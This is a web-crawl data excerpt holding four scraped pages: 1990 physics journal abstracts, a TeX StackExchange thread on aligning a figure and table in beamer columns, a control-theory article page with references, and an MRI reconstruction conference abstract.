url stringlengths 14 2.42k | text stringlengths 100 1.02M | date stringlengths 19 19 | metadata stringlengths 1.06k 1.1k |
|---|---|---|---|
https://www.actaphys.uj.edu.pl/index_n.php?I=R&V=21&N=3 | ### Regular Series
#### Vol. 21 (1990), No. 3, pp. 171 – 252
Charges, Monopoles and Unit Systems
Acta Phys. Pol. B 21, 171 (1990)
page 171 •
abstract
Using an explicit notation for units, it is argued that electromagnetic fields measured by means of a charge and the corresponding fields measured by a monopole, are different physical entities. This result is related to the persistent failure of the experimental quest for monopoles.
Thermodynamics of Negative Absolute Pressures
Acta Phys. Pol. B 21, 177 (1990)
page 177 •
abstract
States with negative absolute pressure are investigated from thermodynamic viewpoint. It is found that negativity of pressure does not contradict Callen’s postulates, and the postulates cannot be extended in a natural way to rule out just these states. These states may be stable against small fluctuations. In nuclear physics, QCD and GUT, $p \lt 0$ states are easy to interpret by thermodynamics.
Instantons in QCD and Soliton Models of Hadrons
Acta Phys. Pol. B 21, 189 (1990)
page 189 •
abstract
Using an analogy to a well known soliton model of hadrons the existence of the quark sea appearing in deep inelastic lepton-hadron scattering is justified. Then using the existence of $\left \lt \bar \psi \psi \right \gt$ condensate in QCD we insert in the QCD functional integral a Lorentz scalar field which describes the quark-anti-quark pairs, and produces a dynamical mass for quarks.
Dirac Equation with Hidden Extra Spins: A Generalization of Kahler Equation. Part Two
Acta Phys. Pol. B 21, 201 (1990)
page 201 •
abstract
A sequence of equations numerated by $N = 1$, 2, 3, $\dots$ realizing the Dirac square-root procedure for spin $0 \otimes 1 \otimes \dots \frac {1}{2}N(N$ even) or $\frac {1}{2} \otimes \frac {3}{2} \otimes \dots \otimes \frac {1}{2}N(N$ odd), is further discussed. For $N = 2$ the Dfrac-type form of Kähler equation is reproduced. The equation with $N=3$ is conjectured to be physically distinguished, providing a model for fermion generations.
Finite Temperature Effect on Strings in Curved Space
Acta Phys. Pol. B 21, 209 (1990)
page 209 •
abstract
Using thermofield dynamics we study finite temperature effects on strings in curved space.
full authors' list
M. Tariq, Tauseef Ahmad, M. Zafar, M. Irfan, M.Z. Ahsan, M. Shafi
Some Angle Dependent Characteristics of Charged Shower Particles Produced at High Energies
Acta Phys. Pol. B 21, 215 (1990)
page 215 •
abstract
The angular distributions of showers in lab. and c.m. systems have been studied for various effective target thickness. Also the variation of particle number densities in lab. and c.m. systems has been given as a function of $\bar \nu$. It is observed that the particle density decreases with effective target mass in the most forward region in laboratory system whereas it shows an increasing trend in the c.m. system. The results seem to agree with CTM type of pictures of interaction. Some results on variation of $R_{\rm A}$ with in different $\eta$-intervals have also been presented.
Nuclear Matter Approach to the Heavy-Ion Optical Potential and the Proximity Approximation
Acta Phys. Pol. B 21, 223 (1990)
page 223 •
abstract
A simple theory of the heavy-ion optical potential $\cal {V}$, based on the local density approach and the frozen density model, is used to derive the energy dependent proximity approximation $\cal {V}^{\rm P}$ for the complex potential $\cal {V}$. Both $\cal {V}$ and $\cal {V}^{\rm P}$ are calculated, and the accuracy of the proximity approximation and of the scaling law implied by the approximation is tested.
Strange Matter Bubble Formation Inside Neutron Matter
Acta Phys. Pol. B 21, 245 (1990)
page 245 •
abstract
Initial stages of the phase transition of the neutron matter into strange matter at zero temperature and finite pressure are considered. Bubble formation is calculated numerically for pressures typical for a neutron star interior. The critical bubble size decreases rapidly with pressure, reaching minimum at $p \sim 20$ MeV/fm$^3$.
top
ver. 2021.06.25 • we use cookies and MathJax | 2021-07-31 21:28:42 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.6466313004493713, "perplexity": 2051.8994740843777}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": false}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-31/segments/1627046154126.73/warc/CC-MAIN-20210731203400-20210731233400-00264.warc.gz"} |
http://tex.stackexchange.com/questions/23525/side-to-side-figure-and-table-in-beamer-problem?answertab=votes | # Side-to-side figure and table in beamer problem
\begin{figure}
%\centering
\begin{minipage}[h]{0.58\textwidth}
\centering
\includegraphics[scale=0.4,trim=12mm 15mm 12mm 15mm]{fig1}
\end{minipage}
\begin{minipage}[h]{0.38\textwidth}
\centering
\include{fig2}
\end{minipage}
\end{figure}
I get the fig1 nicely placed in the center of the left side BUT fig2 'sank' at the bottom of the right side. I dont really know what's wrong with the code. Actually fig2 is a table which i store as a tex file with codes only, something like:
\begin{tabular}{|c|c|}
\hline
aa & bb \\ \hline
0 & 10 \\ \hline
1 & 2 \\ \hline
\end{tabular}
Hope someone will help me fix this. Thanks in advance.
-
A tip: If you indent lines by 4 spaces, then they are marked as a code sample. You can also highlight the code and click the "code" button (with "{}" on it). – lockstep Jul 19 '11 at 18:01
@lockstep thanks for the tip. i was about to do it. too rush to post the question. – hotaru Jul 19 '11 at 18:05
Sorry - I wasn't sure if you knew this feature, but I should have waited 5 minutes nevertheless. – lockstep Jul 19 '11 at 18:08
@lockstep dont worry about that.. the more important thing is to get the right answer. – hotaru Jul 19 '11 at 18:22
May I suggest that you use
\RequirePackage[demo]{graphicx} % So the demo works!
\documentclass{beamer}
\begin{document}
\begin{frame}
\begin{columns}
\begin{column}{0.5\textwidth}
\centering
\includegraphics[width = 2 cm]{demo}
\end{column}
\begin{column}{0.5\textwidth}
\centering
\includegraphics[width = 2 cm]{demo}
\end{column}
\end{columns}
\end{frame}
\end{document}
-
i tried this (of course after you suggest). ehm... it doesnt work. actually fig2 is a table which i store in a tex file, with a code sth like in the questions (sorry, just add this) – hotaru Jul 19 '11 at 18:24
@hotaru: then, please edit your question and include a minimal working example (MWE) illustrating the problem. I ask you for this MWE since I used a solution similar to the one by 5gon12eder and everything worked as expected. – Gonzalo Medina Jul 19 '11 at 19:02
You want the optional argument to the column environment:
\RequirePackage[demo]{graphicx}
\documentclass{beamer}
\begin{document}
\begin{frame}
\begin{columns}[T]
\begin{column}{0.5\textwidth}
\centering
\includegraphics[height = 2 cm]{demo}
\end{column}
\begin{column}{0.5\textwidth}
\centering
\includegraphics[height = 1 cm]{demo}
\end{column}
\end{columns}
\end{frame}
\end{document}
(beamer manual, section 12.7)
-
The subfig package is excellent for side-by-side figures and tables.
There is a nice example here: https://secure.wikimedia.org/wikibooks/en/wiki/LaTeX/Floats,_Figures_and_Captions#Subfloats
-
if you mean that advice as an answer, it would be great if you would rephrase it, since this question to the OP looks like a comment. It would be good to elaborate it, besides posting a link. – Stefan Kottwitz Sep 3 '11 at 18:56
Sorry, unfortunately I don't have the required reputation to comment under the question yet. Also, the example link does go straight to a relevant code snippet, so copy-and-pasting it seemed unnecessary - I did not realize this violated etiquette. – Dan Sep 3 '11 at 20:31 | 2015-08-04 07:41:05 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9839293360710144, "perplexity": 1657.9242851532474}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2015-32/segments/1438042990603.54/warc/CC-MAIN-20150728002310-00126-ip-10-236-191-2.ec2.internal.warc.gz"} |
https://www.aimsciences.org/article/doi/10.3934/naco.2020027 | # American Institute of Mathematical Sciences
• Previous Article
Design of experiment for tuning parameters of an ant colony optimization method for the constrained shortest Hamiltonian path problem in the grid networks
• NACO Home
• This Issue
• Next Article
Examination of solving optimal control problems with delays using GPOPS-Ⅱ
June 2021, 11(2): 307-320. doi: 10.3934/naco.2020027
## Novel Conditions of Euclidean space controllability for singularly perturbed systems with input delay
Department of Applied Mathematics, ORT Braude College of Engineering, Karmiel, Israel, and, Independent Center for Studies, in Control Theory and Applications, Haifa, Israel
Received August 2019 Revised March 2020 Published June 2021 Early access May 2020
A singularly perturbed linear time-dependent controlled system with a point-wise nonsmall (of order of $1$) delay in the input (the control variable) is considered. Sufficient conditions of the complete Euclidean space controllability for this system, robust with respect to the parameter of singular perturbation, are derived. This derivation is based on an asymptotic analysis of the controllability matrix for the considered system and on such an analysis of the determinant of this matrix. However, this derivation does not use a slow-fast decomposition of the considered system. The theoretical result is illustrated by an example.
Citation: Valery Y. Glizer. Novel Conditions of Euclidean space controllability for singularly perturbed systems with input delay. Numerical Algebra, Control and Optimization, 2021, 11 (2) : 307-320. doi: 10.3934/naco.2020027
##### References:
[1] A. Bensoussan, G. Da Prato, M. C. Delfour and S. K. Mitter, Representation and Control of Infinite Dimensional Systems, Birkhuser, Boston, 2007. [2] M. G. Dmitriev and G. A. Kurina, Singular perturbations in control problems, Automat. Rem. Contr., 67 (2006), 1-43. doi: 10.1134/S0005117906010012. [3] E. Fridman, Robust sampled-data $H_\infty$ control of linear singularly perturbed systems, IEEE Trans. Automat. Control, 51 (2006), 470-475. doi: 10.1109/TAC.2005.864194. [4] R. Gabasov and F. M. Kirillova, The Qualitative Theory of Optimal Processes, Marcel Dekker Inc., New York, 1976. [5] V. Y. Glizer, Novel controllability conditions for a class of singularly perturbed systems with small state delays, J. Optim. Theory Appl., 137 (2008), 135-156. doi: 10.1007/s10957-007-9324-8. [6] V. Y. Glizer, Cheap quadratic control of linear systems with state and control delays, Dyn. Contin. Discrete Impuls. Syst. Ser. B Appl. Algorithms, 19 (2012), 277-301. [7] V. Y. Glizer, Controllability conditions of linear singularly perturbed systems with small state and input delays, Math. Control Signals Systems, 28 (2016), 1-29. doi: 10.1007/s00498-015-0152-3. [8] V. Y. Glizer, Euclidean space output controllability of singularly perturbed systems with small state delays, J. Appl. Math. Comput., 57 (2018), 1-38. doi: 10.1007/s12190-017-1092-5. [9] V. Y. Glizer, Euclidean space controllability conditions for singularly perturbed linear systems with multiple state and control delays, Axioms, 8 (2019), 1-27. doi: 10.1007/s12190-017-1092-5. [10] V. Y. Glizer, Euclidean space controllability conditions of singularly perturbed systems with multiple state and control delays, in Proceedings of the 15th IEEE International Conference on Control and Automation, Edinburgh, Scotland, (2019), 1144–1149. [11] V. Y. Glizer, Conditions of functional null controllability for some types of singularly perturbed nonlinear systems with delays, Axioms, 8 (2019), 1-19. [12] V. Y. Glizer and V. Turetsky, Robust Controllability of Linear Systems, Nova Science Publishers Inc., New York, 2012. [13] R. E. Kalman, Contributions to the theory of optimal control, Bol. Soc. Mat. Mex., 5 (1960), 102-119. [14] J. Klamka, Controllability of Dynamical Systems, Kluwer Academic Publishers, Dordrecht, Netherlands, 1991. [15] J. Klamka, Controllability of dynamical systems. A survey, Bulletin of the Polish Academy of Sciences: Technical Sciences, 61 (2013), 335-342. [16] P. V. Kokotovic, H. K. Khalil and J. O'Reilly, Singular Perturbation Methods in Control: Analysis and Design, Academic Press, London, 1986. [17] T. B. Kopeikina, Controllability of singularly perturbed linear systems with time-lag, Differ. Equ., 25 (1989), 1055-1064. [18] T. B. Kopeikina, Unified method of investigating controllability and observability problems of time-variable differential systems, Funct. Differ. Equ., 13 (2006), 463-481. [19] C. Kuehn, Multiple Time Scale Dynamics, Springer, New York, 2015. doi: 10.1007/978-3-319-12316-5. [20] G. A. Kurina, Complete controllability of singularly perturbed systems with slow and fast modes, Math. Notes, 52 (1992), 1029-1033. doi: 10.1007/BF01210436. [21] C. G. Lange and R. M. Miura, Singular perturbation analysis of boundary-value problems for differential-difference equations. Part V: small shifts with layer behavior, SIAM J. Appl. Math., 54 (1994), 249-272. doi: 10.1137/S0036139992228120. [22] L. Pavel, Game Theory for Control of Optical Networks, Birkhauser, Basel, Switzerland, 2012. doi: 10.1007/978-0-8176-8322-1. [23] M. L. Pe$\stackrel{ }{ n }$a, Asymptotic expansion for the initial value problem of the sunflower equation, J. Math. Anal. Appl., 143 (1989), 471-479. doi: 10.1016/0022-247X(89)90053-X. [24] L. S. Pontryagin, V. G. Boltyanskii, R. V. Gamkrelidze and E. F. Mishchenko, The Mathematical Theory of Optimal Processes, Interscience, New York, 1962. [25] P. B. Reddy and and P. Sannuti, Optimal control of a coupled-core nuclear reactor by singular perturbation method, IEEE Trans. Automat. Control, 20 (1975), 766-769. [26] P. Sannuti, On the controllability of singularly perturbed systems, IEEE Trans. Automat. Control, 22 (1977), 622-624. doi: 10.1109/tac.1977.1101568. [27] P. Sannuti, On the controllability of some singularly perturbed nonlinear systems, J. Math. Anal. Appl., 64 (1978), 579-591. doi: 10.1016/0022-247X(78)90006-9. [28] E. Schöll, G. Hiller, P. Hövel and M. A. Dahlem, Time-delayed feedback in neurosystems, Phil. Trans. R. Soc. A, 367 (2009), 1079-1096. doi: 10.1098/rsta.2008.0258. [29] N. Stefanovic and L. Pavel, A Lyapunov-Krasovskii stability analysis for game-theoretic based power control in optical links, Telecommun. Syst., 47 (2011), 19-33. [30] O. Tsekhan, Complete controllability conditions for linear singularly perturbed time-invariant systems with multiple delays via Chang-type transformation, Axioms, 8 (2019), 1-19. [31] Y. Zhang, D. S. Naidu, C. Cai and Y. Zou, Singular perturbations and time scales in control theories and applications: an overview 2002–2012, Int. J. Inf. Syst. Sci. 9 (2014), 1-36.
show all references
##### References:
[1] A. Bensoussan, G. Da Prato, M. C. Delfour and S. K. Mitter, Representation and Control of Infinite Dimensional Systems, Birkhuser, Boston, 2007. [2] M. G. Dmitriev and G. A. Kurina, Singular perturbations in control problems, Automat. Rem. Contr., 67 (2006), 1-43. doi: 10.1134/S0005117906010012. [3] E. Fridman, Robust sampled-data $H_\infty$ control of linear singularly perturbed systems, IEEE Trans. Automat. Control, 51 (2006), 470-475. doi: 10.1109/TAC.2005.864194. [4] R. Gabasov and F. M. Kirillova, The Qualitative Theory of Optimal Processes, Marcel Dekker Inc., New York, 1976. [5] V. Y. Glizer, Novel controllability conditions for a class of singularly perturbed systems with small state delays, J. Optim. Theory Appl., 137 (2008), 135-156. doi: 10.1007/s10957-007-9324-8. [6] V. Y. Glizer, Cheap quadratic control of linear systems with state and control delays, Dyn. Contin. Discrete Impuls. Syst. Ser. B Appl. Algorithms, 19 (2012), 277-301. [7] V. Y. Glizer, Controllability conditions of linear singularly perturbed systems with small state and input delays, Math. Control Signals Systems, 28 (2016), 1-29. doi: 10.1007/s00498-015-0152-3. [8] V. Y. Glizer, Euclidean space output controllability of singularly perturbed systems with small state delays, J. Appl. Math. Comput., 57 (2018), 1-38. doi: 10.1007/s12190-017-1092-5. [9] V. Y. Glizer, Euclidean space controllability conditions for singularly perturbed linear systems with multiple state and control delays, Axioms, 8 (2019), 1-27. doi: 10.1007/s12190-017-1092-5. [10] V. Y. Glizer, Euclidean space controllability conditions of singularly perturbed systems with multiple state and control delays, in Proceedings of the 15th IEEE International Conference on Control and Automation, Edinburgh, Scotland, (2019), 1144–1149. [11] V. Y. Glizer, Conditions of functional null controllability for some types of singularly perturbed nonlinear systems with delays, Axioms, 8 (2019), 1-19. [12] V. Y. Glizer and V. Turetsky, Robust Controllability of Linear Systems, Nova Science Publishers Inc., New York, 2012. [13] R. E. Kalman, Contributions to the theory of optimal control, Bol. Soc. Mat. Mex., 5 (1960), 102-119. [14] J. Klamka, Controllability of Dynamical Systems, Kluwer Academic Publishers, Dordrecht, Netherlands, 1991. [15] J. Klamka, Controllability of dynamical systems. A survey, Bulletin of the Polish Academy of Sciences: Technical Sciences, 61 (2013), 335-342. [16] P. V. Kokotovic, H. K. Khalil and J. O'Reilly, Singular Perturbation Methods in Control: Analysis and Design, Academic Press, London, 1986. [17] T. B. Kopeikina, Controllability of singularly perturbed linear systems with time-lag, Differ. Equ., 25 (1989), 1055-1064. [18] T. B. Kopeikina, Unified method of investigating controllability and observability problems of time-variable differential systems, Funct. Differ. Equ., 13 (2006), 463-481. [19] C. Kuehn, Multiple Time Scale Dynamics, Springer, New York, 2015. doi: 10.1007/978-3-319-12316-5. [20] G. A. Kurina, Complete controllability of singularly perturbed systems with slow and fast modes, Math. Notes, 52 (1992), 1029-1033. doi: 10.1007/BF01210436. [21] C. G. Lange and R. M. Miura, Singular perturbation analysis of boundary-value problems for differential-difference equations. Part V: small shifts with layer behavior, SIAM J. Appl. Math., 54 (1994), 249-272. doi: 10.1137/S0036139992228120. [22] L. Pavel, Game Theory for Control of Optical Networks, Birkhauser, Basel, Switzerland, 2012. doi: 10.1007/978-0-8176-8322-1. [23] M. L. Pe$\stackrel{ }{ n }$a, Asymptotic expansion for the initial value problem of the sunflower equation, J. Math. Anal. Appl., 143 (1989), 471-479. doi: 10.1016/0022-247X(89)90053-X. [24] L. S. Pontryagin, V. G. Boltyanskii, R. V. Gamkrelidze and E. F. Mishchenko, The Mathematical Theory of Optimal Processes, Interscience, New York, 1962. [25] P. B. Reddy and and P. Sannuti, Optimal control of a coupled-core nuclear reactor by singular perturbation method, IEEE Trans. Automat. Control, 20 (1975), 766-769. [26] P. Sannuti, On the controllability of singularly perturbed systems, IEEE Trans. Automat. Control, 22 (1977), 622-624. doi: 10.1109/tac.1977.1101568. [27] P. Sannuti, On the controllability of some singularly perturbed nonlinear systems, J. Math. Anal. Appl., 64 (1978), 579-591. doi: 10.1016/0022-247X(78)90006-9. [28] E. Schöll, G. Hiller, P. Hövel and M. A. Dahlem, Time-delayed feedback in neurosystems, Phil. Trans. R. Soc. A, 367 (2009), 1079-1096. doi: 10.1098/rsta.2008.0258. [29] N. Stefanovic and L. Pavel, A Lyapunov-Krasovskii stability analysis for game-theoretic based power control in optical links, Telecommun. Syst., 47 (2011), 19-33. [30] O. Tsekhan, Complete controllability conditions for linear singularly perturbed time-invariant systems with multiple delays via Chang-type transformation, Axioms, 8 (2019), 1-19. [31] Y. Zhang, D. S. Naidu, C. Cai and Y. Zou, Singular perturbations and time scales in control theories and applications: an overview 2002–2012, Int. J. Inf. Syst. Sci. 9 (2014), 1-36.
[1] Pavel Krejčí, Giselle A. Monteiro. Inverse parameter-dependent Preisach operator in thermo-piezoelectricity modeling. Discrete and Continuous Dynamical Systems - B, 2019, 24 (7) : 3051-3066. doi: 10.3934/dcdsb.2018299 [2] Ralf W. Wittenberg. Optimal parameter-dependent bounds for Kuramoto-Sivashinsky-type equations. Discrete and Continuous Dynamical Systems, 2014, 34 (12) : 5325-5357. doi: 10.3934/dcds.2014.34.5325 [3] Jiaquan Liu, Xiangqing Liu, Zhi-Qiang Wang. Sign-changing solutions for a parameter-dependent quasilinear equation. Discrete and Continuous Dynamical Systems - S, 2021, 14 (5) : 1779-1799. doi: 10.3934/dcdss.2020454 [4] Guglielmo Feltrin, Elisa Sovrano, Andrea Tellini. On the number of positive solutions to an indefinite parameter-dependent Neumann problem. Discrete and Continuous Dynamical Systems, 2022, 42 (1) : 21-71. doi: 10.3934/dcds.2021107 [5] Péter Koltai, Alexander Volf. Optimizing the stable behavior of parameter-dependent dynamical systems --- maximal domains of attraction, minimal absorption times. Journal of Computational Dynamics, 2014, 1 (2) : 339-356. doi: 10.3934/jcd.2014.1.339 [6] Saroj P. Pradhan, Janos Turi. Parameter dependent stability/instability in a human respiratory control system model. Conference Publications, 2013, 2013 (special) : 643-652. doi: 10.3934/proc.2013.2013.643 [7] Scott W. Hansen, Oleg Yu Imanuvilov. Exact controllability of a multilayer Rao-Nakra plate with free boundary conditions. Mathematical Control and Related Fields, 2011, 1 (2) : 189-230. doi: 10.3934/mcrf.2011.1.189 [8] El Mustapha Ait Ben Hassi, Mohamed Fadili, Lahcen Maniar. Controllability of a system of degenerate parabolic equations with non-diagonalizable diffusion matrix. Mathematical Control and Related Fields, 2020, 10 (3) : 623-642. doi: 10.3934/mcrf.2020013 [9] Feifei Cheng, Ji Li. Geometric singular perturbation analysis of Degasperis-Procesi equation with distributed delay. Discrete and Continuous Dynamical Systems, 2021, 41 (2) : 967-985. doi: 10.3934/dcds.2020305 [10] Stéphane Chrétien, Sébastien Darses, Christophe Guyeux, Paul Clarkson. On the pinning controllability of complex networks using perturbation theory of extreme singular values. application to synchronisation in power grids. Numerical Algebra, Control and Optimization, 2017, 7 (3) : 289-299. doi: 10.3934/naco.2017019 [11] Brahim Allal, Abdelkarim Hajjaj, Jawad Salhi, Amine Sbai. Boundary controllability for a coupled system of degenerate/singular parabolic equations. Evolution Equations and Control Theory, 2021 doi: 10.3934/eect.2021055 [12] Belhassen Dehman, Jean-Pierre Raymond. Exact controllability for the Lamé system. Mathematical Control and Related Fields, 2015, 5 (4) : 743-760. doi: 10.3934/mcrf.2015.5.743 [13] Xianlong Fu. Approximate controllability of semilinear non-autonomous evolution systems with state-dependent delay. Evolution Equations and Control Theory, 2017, 6 (4) : 517-534. doi: 10.3934/eect.2017026 [14] Soniya Singh, Sumit Arora, Manil T. Mohan, Jaydev Dabas. Approximate controllability of second order impulsive systems with state-dependent delay in Banach spaces. Evolution Equations and Control Theory, 2022, 11 (1) : 67-93. doi: 10.3934/eect.2020103 [15] Franck Boyer, Guillaume Olive. Approximate controllability conditions for some linear 1D parabolic systems with space-dependent coefficients. Mathematical Control and Related Fields, 2014, 4 (3) : 263-287. doi: 10.3934/mcrf.2014.4.263 [16] R. S. Johnson. A selection of nonlinear problems in water waves, analysed by perturbation-parameter techniques. Communications on Pure and Applied Analysis, 2012, 11 (4) : 1497-1522. doi: 10.3934/cpaa.2012.11.1497 [17] Piotr Gwiazda, Sander C. Hille, Kamila Łyczek, Agnieszka Świerczewska-Gwiazda. Differentiability in perturbation parameter of measure solutions to perturbed transport equation. Kinetic and Related Models, 2019, 12 (5) : 1093-1108. doi: 10.3934/krm.2019041 [18] Emile Franc Doungmo Goufo. Bounded perturbation for evolution equations with a parameter & application to population dynamics. Discrete and Continuous Dynamical Systems - S, 2021, 14 (7) : 2137-2150. doi: 10.3934/dcdss.2020177 [19] Ross Callister, Duc-Son Pham, Mihai Lazarescu. Using distribution analysis for parameter selection in repstream. Mathematical Foundations of Computing, 2019, 2 (3) : 215-250. doi: 10.3934/mfc.2019015 [20] Baskar Sundaravadivoo. Controllability analysis of nonlinear fractional order differential systems with state delay and non-instantaneous impulsive effects. Discrete and Continuous Dynamical Systems - S, 2020, 13 (9) : 2561-2573. doi: 10.3934/dcdss.2020138
Impact Factor: | 2022-05-24 00:05:49 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.4752991199493408, "perplexity": 4117.378333433071}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-21/segments/1652662562106.58/warc/CC-MAIN-20220523224456-20220524014456-00377.warc.gz"} |
http://indexsmart.mirasmart.com/ISMRM2018/PDFfiles/3543.html | ### 3543
Rapid Parallel MRI Reconstruction Utilizing the Wavelet Filter Bank
Efrat Shimron1, Andrew G. Webb2, and Haim Azhari1
1Department of Biomedical Engineering, Technion - Israel Institute of Technology, Haifa, Israel, 2Department of Radiology, Leiden University, Leiden, Netherlands
### Synopsis
A novel method for reconstruction from highly undersampled parallel MRI data is proposed. The method computes the Stationary Wavelet Transform (SWT) of the unknown MR image directly from sub-sampled k-space measurements, and then recovers the image using the Inverse SWT filter bank. Experiments with in-vivo data show that this method produces high quality reconstructions, comparable to Compressed Sensing (CS) reconstructions. However, unlike CS, the proposed method is non-iterative. Moreover, it is simple, fast, and allows flexible (random or ordered) k-space undersampling schemes.
### Purpose
Parallel Imaging (PI) and Compressed Sensing (CS) are two well-established approaches for image reconstruction from undersampled k-space data. CS-MRI methods offer high k-space undersampling, using random schemes, at the price of time-intensive iterative computations; these computations repetitive implementations of forward and inverse transforms of two types, the Fourier transform and a sparsifying transform. PI methods enable rapid ordered sampling trajectories and faster computations; however they commonly do not exploit the benefits offered by non-Fourier transforms. This work introduces a novel PI reconstruction method that offers fast non-iterative computations, is suitable for arbitrary undersampling of a Cartesian k-space, and operates in the Stationary Wavelet Transform (SWT) domain.
### Theory
The proposed PI method consists of two steps: (i) computation of the full SWT decomposition of the unknown MR image directly from the sub-sampled k-space data, and (ii) image reconstruction by implementation of the Inverse Stationary Wavelet Transform (ISWT) filter bank.
The method exploits the theory of convolution-image computation1 for parallel multi-coil acquisition. Essentially, given k-space data sub-sampled along columns (or rows), this theory allows the computation of the convolution between the unknown MR image $f(x,y)$ and a user defined kernel $g(x)$, i.e.
$$h(x,y)=f(x,y)*g(x).$$
In step (i) of the proposed method, this equation is implemented separately with two kernels corresponding to the first-level SWT filters of an analysis filter bank2. In other words, $g(x)$ is first defined as the Low-Pass Decomposition (LPD) filter and $h^{LP}(x,y)=f(x,y)*g^{LPD}(x)$ is computed. Secondly, $g(x)$ is defined as the High-Pass Decomposition (HPD) filter, and $h^{HP}(x,y)=f(x,y)*g^{HPD}(x)$ is computed. By definition2, these computations produce the first-level approximation and details coefficients of the 1D SWT of $f(x,y)$, where the transform is performed along rows.
In step (ii) of the proposed method, $f(x,y)$ is reconstructed by the ISWT, i.e. through the synthesis filter bank. In this process, the Low-Pass Reconstruction (LPR) filter $g^{LPR}(x)$ and High-Pass Reconstruction (HPR) filter $g^{HPR}(x)$ are applied to $h^{LP}(x,y)$ and $h^{HP}(x,y)$ correspondingly, and the results are summed, producing the reconstructed image,
$$f^{rec}(x,y)=h^{LP}(x,y)*g^{LPR}(x)+h^{HP}(x,y)*g^{HPR}(x).$$
According to the wavelet filter bank theory, the two decomposition filters $g^{LPD}(x)$, $g^{HPD}(x)$ and the two synthesis filters $g^{LPR}(x)$, $g^{HPR}(x)$ form together a two-channel quadrature mirror filter bank.
### Methods
The proposed method was implemented on in-vivo data from two T1-weighted-7Tesla scans of a healthy volunteer using a 32 coil receive array. Sensitivity maps were estimated from low-resolution pre-scans. After acquiring high-resolution scans, k-space data were retrospectively sub-sampled in one dimension with a reduction factor $R=4$. The proposed method was implemented with the SWT Daubchies-2 wavelet filter bank and an additional single-step soft-thresholding for denoising. Results of this method were compared with those of a recent CS method that utilizes the SWT3. All reconstructions were compared to a gold standard reconstruction (from a fully sampled k-space) by using the NRMSE measure.
### Results
Figure 1 demonstrates the SWT coefficients computed from the in-vivo data. It includes the approximation (low-pass) and details (high-pass) coefficients computed from 25% of k-space data by the proposed method (left column), and those computed from the fully sampled data (right column). Clearly, our method produced a highly accurate reconstruction of the SWT coefficients. Figure 2 shows the final image reconstructions of the same data set. The proposed method produced an image which includes all the anatomical structures that are present in the gold standard image, without discernible artifacts. This excellent reconstruction quality is reflected by the low NRMSE value of 0.012. It is also apparent from figure 2 that our single-step method produced a reconstruction very similar to the CS reconstruction, while the latter method required 24 iterations for convergence.
Similar high-quality results were obtained in a second in-vivo experiment (figure 3). Our proposed method produced an image similar to the gold standard and to the CS reconstruction. In this case, the CS process required 85 iterations for convergence to the same NRMSE level obtained by our single-step method.
### Disccusion & Conclusion
This work introduces a novel parallel MRI method that utilizes efficient wavelet-domain processing. This method reconstructs the SWT coefficients of the unknown MR image directly from highly undersampled k-space data, and then reconstructs the image using the ISWT filter bank.
The proposed method offers the following advantages: (1) a non-iterative reconstruction process, which yields results comparable to those of an iterative CS reconstruction, (2) flexible arbitrary undersampling of a Cartesian k-space, and (3) efficient data processing in the redundant SWT domain. Due to its simplicity and fast implementation, the proposed method may be highly suitable for real-time MRI applications.
### Acknowledgements
No acknowledgement found.
### References
1. Azhari H, Sodickson DK, Edelman RR. Rapid MR imaging by sensitivity profile indexing and deconvolution reconstruction (SPID). Magnetic Resonance Imaging. 2003;21(6):575–584.
2. Mallat SG. A wavelet tour of signal processing. Academic Press; 1999.
3. Kayvanrad MH, McLeod AJ, Baxter JSH, McKenzie CA, Peters TM. Stationary wavelet transform for under-sampled MRI reconstruction. Magnetic Resonance Imaging. 2014;32(10):1353–1364.
### Figures
Figure 1: Reconstruction of the Stationary Wavelet Transform (SWT) of the unknown MR image from an in-vivo 32-coils parallel head scan. Left: reconstruction from 25% of k-space data using the proposed method. Right: reconstruction from the fully-sampled k-space data.
